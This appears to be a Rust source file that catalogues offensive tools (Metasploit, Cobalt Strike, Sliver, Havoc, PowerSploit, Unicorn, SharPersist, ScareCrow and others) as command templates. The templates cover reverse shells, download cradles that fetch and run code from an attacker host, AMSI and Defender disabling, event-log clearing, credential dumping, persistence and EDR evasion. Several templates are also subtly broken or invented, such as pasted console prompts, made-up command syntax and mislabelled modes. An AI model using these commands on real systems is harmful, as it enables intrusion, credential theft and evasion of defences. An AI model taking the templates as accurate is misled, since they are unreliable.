use crate::tools::types::{Tool, Mode, InputKind, OutputFormat};

pub const TOOLS: &[Tool] = &[
    Tool {
        name: "Metasploit Framework",
        binary: "msfconsole",
        description: "Industry-standard penetration testing framework.",
        modes: &[
            Mode {
                name: "Exploit Launch",
                cmd_template: r#"msfconsole -x 'use {exploit}; set RHOSTS {target}; set PAYLOAD {payload}; set LHOST {lhost}; run' > {output_file}"#,
                inputs: &[InputKind::Custom("Exploit", "exploit"), InputKind::Target, InputKind::Payload, InputKind::Lhost],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Handler Start",
                cmd_template: r#"msfconsole -x 'use exploit/multi/handler; set PAYLOAD {payload}; set LHOST {lhost}; set LPORT {lport}; run' > {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Persistence Service",
                cmd_template: r#"meterpreter > run persistence -U -i 5 -p {port} -r {lhost} > {output_file}"#,
                inputs: &[InputKind::Ports, InputKind::Lhost],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Process Migrate",
                cmd_template: r#"meterpreter > migrate {pid} > {output_file}"#,
                inputs: &[InputKind::Custom("Pid", "pid")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Keylogger",
                cmd_template: r#"meterpreter > keyscan_start > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Screenshot",
                cmd_template: r#"meterpreter > screenshot -p {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Raw,
                file_ext: "png",
            },
            Mode {
                name: "Hash Dump",
                cmd_template: r#"meterpreter > hashdump > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Port Forward",
                cmd_template: r#"meterpreter > portfwd add -l {local} -p {remote} -r {target} > {output_file}"#,
                inputs: &[InputKind::Custom("Local", "local"), InputKind::Custom("Remote", "remote"), InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Route Add",
                cmd_template: r#"meterpreter > run autoroute -s {subnet} > {output_file}"#,
                inputs: &[InputKind::Custom("Subnet", "subnet")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Session",
                cmd_template: r#"msfconsole -x 'use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST {lhost}; set LPORT {port}; set ExitOnSession false; set AutoRunScript post/windows/manage/migrate; run -j' > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Cobalt Strike",
        binary: "teamserver",
        description: "Commercial adversary simulation and red team platform.",
        modes: &[
            Mode {
                name: "Listener Setup",
                cmd_template: r#"teamserver {lhost} {password} {c2_profile} > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Password, InputKind::Custom("C2 Profile", "c2_profile")],
                output_format: OutputFormat::Lines,
                file_ext: "log",
            },
            Mode {
                name: "Payload Gen",
                cmd_template: r#"./aggressor -host {host} -port {port} -user {user} -password {password} > {output_file}"#,
                inputs: &[InputKind::Custom("Host", "host"), InputKind::Ports, InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "PowerShell Payload",
                cmd_template: r#"./aggressor -host {host} -port {port} -user {user} -password {password} -command "powershell" > {output_file}"#,
                inputs: &[InputKind::Custom("Host", "host"), InputKind::Ports, InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Browser Pivot",
                cmd_template: r#"./aggressor -host {host} -port {port} -user {user} -password {password} -command "browserpivot {pid}" > {output_file}"#,
                inputs: &[InputKind::Custom("Host", "host"), InputKind::Ports, InputKind::Username, InputKind::Password, InputKind::Custom("Pid", "pid")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SSH Tunnel",
                cmd_template: r#"./aggressor -host {host} -port {port} -user {user} -password {password} -command "ssh {target} {user} {password}" > {output_file}"#,
                inputs: &[InputKind::Custom("Host", "host"), InputKind::Ports, InputKind::Username, InputKind::Password, InputKind::Target],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SOCKS Proxy",
                cmd_template: r#"./aggressor -host {host} -port {port} -user {user} -password {password} -command "socks {port}" > {output_file}"#,
                inputs: &[InputKind::Custom("Host", "host"), InputKind::Ports, InputKind::Username, InputKind::Password],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Golden Ticket",
                cmd_template: r#"./aggressor -host {host} -port {port} -user {user} -password {password} -command "golden_ticket {domain} {krbtgt_hash}" > {output_file}"#,
                inputs: &[InputKind::Custom("Host", "host"), InputKind::Ports, InputKind::Username, InputKind::Password, InputKind::Domain, InputKind::Custom("Krbtgt Hash", "krbtgt_hash")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Token Steal",
                cmd_template: r#"./aggressor -host {host} -port {port} -user {user} -password {password} -command "steal_token {pid}" > {output_file}"#,
                inputs: &[InputKind::Custom("Host", "host"), InputKind::Ports, InputKind::Username, InputKind::Password, InputKind::Custom("Pid", "pid")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Execute Assembly",
                cmd_template: r#"./aggressor -host {host} -port {port} -user {user} -password {password} -command "execute-assembly {dotnet_assembly}" > {output_file}"#,
                inputs: &[InputKind::Custom("Host", "host"), InputKind::Ports, InputKind::Username, InputKind::Password, InputKind::Custom("Dotnet Assembly", "dotnet_assembly")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Malleable C2",
                cmd_template: r#"./aggressor -host {host} -port {port} -user {user} -password {password} -command "load_profile {profile}.profile" > {output_file}"#,
                inputs: &[InputKind::Custom("Host", "host"), InputKind::Ports, InputKind::Username, InputKind::Password, InputKind::Custom("Profile", "profile")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Sliver C2 (Persistence)",
        binary: "sliver-server",
        description: "Advanced cross-platform C2 with persistence capabilities.",
        modes: &[
            Mode {
                name: "Generate Implant",
                cmd_template: r#"sliver-server generate --mtls {lhost}:{lport} --os windows --arch amd64 --save {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "HTTPS Beacon",
                cmd_template: r#"sliver-server generate --http https://{lhost} --os linux --arch amd64 --save {output_file}"#,
                inputs: &[InputKind::Lhost],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "DNS Beacon",
                cmd_template: r#"sliver-server generate --dns {domain} --os windows --arch amd64 --save {output_file}"#,
                inputs: &[InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Shellcode",
                cmd_template: r#"sliver-server generate --http {lhost}:{lport} --format shellcode --save {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "Execute Assembly",
                cmd_template: r#"sliver-server execute-assembly -t {session} {assembly} {args} > {output_file}"#,
                inputs: &[InputKind::Session, InputKind::Custom("Assembly", "assembly"), InputKind::Custom("Args", "args")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Process Migrate",
                cmd_template: r#"sliver-server migrate -t {session} {pid} > {output_file}"#,
                inputs: &[InputKind::Session, InputKind::Custom("Pid", "pid")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Shellcode Exec",
                cmd_template: r#"sliver-server execute-shellcode -t {session} {shellcode_file} > {output_file}"#,
                inputs: &[InputKind::Session, InputKind::Custom("Shellcode File", "shellcode_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Credential Dump",
                cmd_template: r#"sliver-server procdump -t {session} -n lsass.exe > {output_file}"#,
                inputs: &[InputKind::Session],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Port Forward",
                cmd_template: r#"sliver-server portfwd add -r {remote_host}:{remote_port} -l {local_port} > {output_file}"#,
                inputs: &[InputKind::Custom("Remote Host", "remote_host"), InputKind::Custom("Remote Port", "remote_port"), InputKind::Custom("Local Port", "local_port")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Multiplayer",
                cmd_template: r#"sliver-server multiplayer > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Havoc C2 (Evasion)",
        binary: "./havoc",
        description: "Modern C2 with Demon agent and sleep mask obfuscation.",
        modes: &[
            Mode {
                name: "Demon Generate",
                cmd_template: r#"./havoc client -> payload generate --profile {profile} --arch x64 --format exe --sleep 15 --jitter 20 --output {output_file}"#,
                inputs: &[InputKind::Custom("Profile", "profile")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "DLL Agent",
                cmd_template: r#"./havoc client -> payload generate --profile {profile} --arch x64 --format dll --output {output_file}"#,
                inputs: &[InputKind::Custom("Profile", "profile")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Shellcode",
                cmd_template: r#"./havoc client -> payload generate --profile {profile} --arch x64 --format shellcode --output {output_file}"#,
                inputs: &[InputKind::Custom("Profile", "profile")],
                output_format: OutputFormat::Raw,
                file_ext: "raw",
            },
            Mode {
                name: "Service Binary",
                cmd_template: r#"./havoc client -> payload generate --profile {profile} --arch x64 --format service-exe --output {output_file}"#,
                inputs: &[InputKind::Custom("Profile", "profile")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "PowerShell",
                cmd_template: r#"./havoc client -> payload generate --profile {profile} --arch x64 --format pspowershell --output {output_file}"#,
                inputs: &[InputKind::Custom("Profile", "profile")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Listener Create",
                cmd_template: r#"./havoc client -> listener create --name {name} --protocol http --port {port} --hosts {lhost} > {output_file}"#,
                inputs: &[InputKind::Custom("Name", "name"), InputKind::Ports, InputKind::Lhost],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Token Steal",
                cmd_template: r#"./havoc client -> token steal {pid} > {output_file}"#,
                inputs: &[InputKind::Custom("Pid", "pid")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Shellcode Inject",
                cmd_template: r#"./havoc client -> shellcode inject {pid} {shellcode_file} > {output_file}"#,
                inputs: &[InputKind::Custom("Pid", "pid"), InputKind::Custom("Shellcode File", "shellcode_file")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Transfer Download",
                cmd_template: r#"./havoc client -> transfer download {remote_file} {local_path} > {output_file}"#,
                inputs: &[InputKind::Custom("Remote File", "remote_file"), InputKind::Custom("Local Path", "local_path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Evasion",
                cmd_template: r#"./havoc client -> payload generate --profile {profile} --arch x64 --format exe --sleep-obf --export {output_file}"#,
                inputs: &[InputKind::Custom("Profile", "profile")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
        ],
    },
    Tool {
        name: "PowerSploit",
        binary: "Invoke-ReflectivePEInjection",
        description: "PowerShell modules for code execution, persistence, and evasion.",
        modes: &[
            Mode {
                name: "Reflective PE",
                cmd_template: r#"Invoke-ReflectivePEInjection -PEBytes $bytes -ProcId {pid} > {output_file}"#,
                inputs: &[InputKind::Custom("Pid", "pid")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Shellcode Injection",
                cmd_template: r#"Invoke-Shellcode -Shellcode $bytes -ProcessId {pid} > {output_file}"#,
                inputs: &[InputKind::Custom("Pid", "pid")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Mimikatz",
                cmd_template: r#"Invoke-Mimikatz -DumpCreds > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Token Manipulation",
                cmd_template: r#"Invoke-TokenManipulation -ImpersonateUser -Username 'nt authority\system' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "WMI Persistence",
                cmd_template: r#"Install-Persistence -Trigger AtLogon -Payload {script} -PayloadType Script > {output_file}"#,
                inputs: &[InputKind::Custom("Script", "script")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "DLL Injection",
                cmd_template: r#"Invoke-DllInjection -ProcessID {pid} -Dll {dll_path} > {output_file}"#,
                inputs: &[InputKind::Custom("Pid", "pid"), InputKind::Custom("Dll Path", "dll_path")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Reverse Shell",
                cmd_template: r#"Invoke-PowerShellTcp -Reverse -IPAddress {lhost} -Port {lport} > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Port Scan",
                cmd_template: r#"Invoke-Portscan -Hosts {target} -Ports {ports} -Threads 100 > {output_file}"#,
                inputs: &[InputKind::Target, InputKind::Ports],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "BloodHound",
                cmd_template: r#"Invoke-BloodHound -CollectionMethod All -ZipFileName {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Full Privesc",
                cmd_template: r#"Invoke-AllChecks > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "AMSI/ETW/Bypass Toolkit",
        binary: "[Ref].Assembly.GetTypes().Where({$_.Name",
        description: "Collection of techniques for bypassing Windows security controls.",
        modes: &[
            Mode {
                name: "AMSI Patch",
                cmd_template: r#"[Ref].Assembly.GetTypes().Where({$_.Name -like '*iUtils'}).GetFields(40).SetValue($null,$true) > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "ETW Patch",
                cmd_template: r#"[System.Diagnostics.Eventing.Reader.EventLogSession]::GlobalSession.ClearLog('Microsoft-Windows-PowerShell/Operational') > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Forced Error",
                cmd_template: r#"[Ref].Assembly.GetTypes() | ForEach-Object { if ($_.Name -like '*iUtils') { $f = $_.GetFields(40); $f[0].SetValue($null,$true) } } > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "CLR Hook",
                cmd_template: r#"[AppDomain]::CurrentDomain.GetAssemblies().Where({$_.GlobalAssemblyCache}).GetType('AmsiUtils') > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Memory Patch",
                cmd_template: r#"[System.Reflection.Assembly]::LoadWithPartialName('System.Management.Automation').GetType('AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true) > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "WD Disable",
                cmd_template: r#"Set-MpPreference -DisableRealtimeMonitoring $true; Set-MpPreference -DisableBehaviorMonitoring $true > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Exclusion Add",
                cmd_template: r#"Add-MpPreference -ExclusionPath 'C:\Temp'; Add-MpPreference -ExclusionProcess 'powershell.exe' > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Encoded Command",
                cmd_template: r#"powershell -enc {base64_command} > {output_file}"#,
                inputs: &[InputKind::Custom("Base64 Command", "base64_command")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Download Cradle",
                cmd_template: r#"powershell -nop -w hidden -c 'IEX(iwr http://{lhost}/{script})' > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Custom("Script", "script")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Evasion",
                cmd_template: r#"[Ref].Assembly.GetTypes().Where({$_.Name -like '*iUtils'}).GetFields(40).SetValue($null,$true); IEX(iwr http://{lhost}/{payload}) > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Payload],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Invoke-Obfuscation",
        binary: "Invoke-Obfuscation",
        description: "PowerShell command and script obfuscation framework.",
        modes: &[
            Mode {
                name: "Token Obfuscation",
                cmd_template: r#"Invoke-Obfuscation -ScriptBlock {script} -Token -Command 'Token,Member,Binary' > {output_file}"#,
                inputs: &[InputKind::Custom("Script", "script")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "AST Obfuscation",
                cmd_template: r#"Invoke-Obfuscation -ScriptBlock {script} -Ast > {output_file}"#,
                inputs: &[InputKind::Custom("Script", "script")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "String Obfuscation",
                cmd_template: r#"Invoke-Obfuscation -ScriptBlock {script} -String > {output_file}"#,
                inputs: &[InputKind::Custom("Script", "script")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Encoding Launcher",
                cmd_template: r#"Invoke-Obfuscation -ScriptBlock {script} -Encoding -Command 'Encoding,Launcher' > {output_file}"#,
                inputs: &[InputKind::Custom("Script", "script")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Compression",
                cmd_template: r#"Invoke-Obfuscation -ScriptBlock {script} -Compress > {output_file}"#,
                inputs: &[InputKind::Custom("Script", "script")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "SecureString",
                cmd_template: r#"Invoke-Obfuscation -ScriptBlock {script} -SecureString > {output_file}"#,
                inputs: &[InputKind::Custom("Script", "script")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Multi-Layer",
                cmd_template: r#"Invoke-Obfuscation -ScriptBlock {script} -Token -String -Encoding > {output_file}"#,
                inputs: &[InputKind::Custom("Script", "script")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Clip Obfuscation",
                cmd_template: r#"Invoke-Obfuscation -ScriptBlock {script} -Clip > {output_file}"#,
                inputs: &[InputKind::Custom("Script", "script")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "File Obfuscation",
                cmd_template: r#"Invoke-Obfuscation -ScriptPath {input}.ps1 -OutputPath {output_file} -Token -String"#,
                inputs: &[InputKind::Custom("Input", "input")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Full Pipeline",
                cmd_template: r#"Invoke-Obfuscation -ScriptBlock {script} -Token -Ast -String -Encoding -Compress -Launcher 'PS' > {output_file}"#,
                inputs: &[InputKind::Custom("Script", "script")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "Unicorn (Evasion)",
        binary: "unicorn.py",
        description: "PowerShell downgrade attack and shellcode injection.",
        modes: &[
            Mode {
                name: "Reverse Shell",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} powershell > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Macro Attack",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} macro > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Certutil",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} certutil > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Custom Shellcode",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py {shellcode_file} powershell > {output_file}"#,
                inputs: &[InputKind::Custom("Shellcode File", "shellcode_file")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Custom Encoding",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} powershell 5 > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "HTA Delivery",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} hta > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "AMSI Bypass",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} powershell --amsi > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "ETW Bypass",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} powershell --etw > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Full Evasion",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} powershell --amsi --etw > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Macro + HTA",
                cmd_template: r#"python3 /opt/tsec/tools/unicorn.py reverse_tcp {lhost} {lport} macro_hta > {output_file}"#,
                inputs: &[InputKind::Lhost, InputKind::Lport],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "SharPersist",
        binary: "SharPersist.exe",
        description: "Windows persistence toolkit with 15+ techniques.",
        modes: &[
            Mode {
                name: "Registry Run Key",
                cmd_template: r#"SharPersist.exe -t reg -c 'powershell.exe' -a '-ep bypass -file C:\temp\script.ps1' -k 'hkcurun' -n {name} --add > {output_file}"#,
                inputs: &[InputKind::Custom("Name", "name")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Scheduled Task",
                cmd_template: r#"SharPersist.exe -t schtask -c 'powershell.exe' -a '-ep bypass -file C:\temp\script.ps1' -n {name} --add > {output_file}"#,
                inputs: &[InputKind::Custom("Name", "name")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Startup Folder",
                cmd_template: r#"SharPersist.exe -t startupfolder -f C:\temp\payload.exe -n {name} --add > {output_file}"#,
                inputs: &[InputKind::Custom("Name", "name")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "WMI Event",
                cmd_template: r#"SharPersist.exe -t wmi -c 'notepad.exe' -n {name} --add > {output_file}"#,
                inputs: &[InputKind::Custom("Name", "name")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Service Creation",
                cmd_template: r#"SharPersist.exe -t service -c 'C:\temp\payload.exe' -n {name} --add > {output_file}"#,
                inputs: &[InputKind::Custom("Name", "name")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Registry Check",
                cmd_template: r#"SharPersist.exe -t reg -k 'hkcurun' --check > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "List All",
                cmd_template: r#"SharPersist.exe -t all --list > {output_file}"#,
                inputs: &[],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Remove Persistence",
                cmd_template: r#"SharPersist.exe -t reg -n {name} --remove > {output_file}"#,
                inputs: &[InputKind::Custom("Name", "name")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Time-based Trigger",
                cmd_template: r#"SharPersist.exe -t schtask -c 'powershell.exe' -n {name} -o logon --add > {output_file}"#,
                inputs: &[InputKind::Custom("Name", "name")],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
            Mode {
                name: "Full Persistence",
                cmd_template: r#"SharPersist.exe -t reg -c 'powershell.exe' -a '-w hidden -enc {payload}' -k 'hkcurun' -n 'Update' --add > {output_file}"#,
                inputs: &[InputKind::Payload],
                output_format: OutputFormat::Lines,
                file_ext: "txt",
            },
        ],
    },
    Tool {
        name: "ScareCrow",
        binary: "ScareCrow",
        description: "EDR evasion payload creation with side-loading.",
        modes: &[
            Mode {
                name: "Binary Loader",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -delivery binary -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Control Panel",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -delivery control -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Excel Loader",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -delivery excel -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "MSI Loader",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -delivery msi -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "DLL Loader",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -delivery dll -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "EDR Unhook",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -delivery binary -unhook -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Custom Process",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -injection {process} -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain, InputKind::Custom("Process", "process")],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Syscall Obf",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -syscall zww -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Sandbox Evasion",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -sandbox -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
            Mode {
                name: "Full Evasion",
                cmd_template: r#"ScareCrow -I {shellcode}.bin -domain {domain} -delivery binary -unhook -sandbox -syscall direct -o {output_file}"#,
                inputs: &[InputKind::Payload, InputKind::Domain],
                output_format: OutputFormat::Raw,
                file_ext: "out",
            },
        ],
    },
];
